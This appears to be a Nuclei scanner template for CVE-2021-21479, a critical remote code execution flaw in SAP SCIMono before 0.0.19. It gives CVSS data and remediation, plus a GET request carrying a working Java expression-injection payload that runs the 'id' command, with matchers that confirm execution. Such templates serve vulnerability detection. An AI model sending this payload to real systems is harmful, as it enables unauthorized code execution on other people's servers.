id: CVE-2021-21479 info: name: SCIMono <0.0.19 - Remote Code Execution author: dwisiswant0 severity: critical description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 epss-score: 0.00396 epss-percentile: 0.70798 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: scimono tags: cve,cve2021,scimono,rce,sap http: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" matchers: - type: word part: body words: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" - '"status" : "400"' condition: and # digest: 490a0046304402206ead8da6ed59dfd823f42fde40909549d8186cccc35abe5b1b4b6aeadd90cdd102204e3126eea7c1aba8303c5b9ba3af98d0bd5b040b58a135c0044e04c00d4e5452:922c64590222798bb761d5b6d8e72950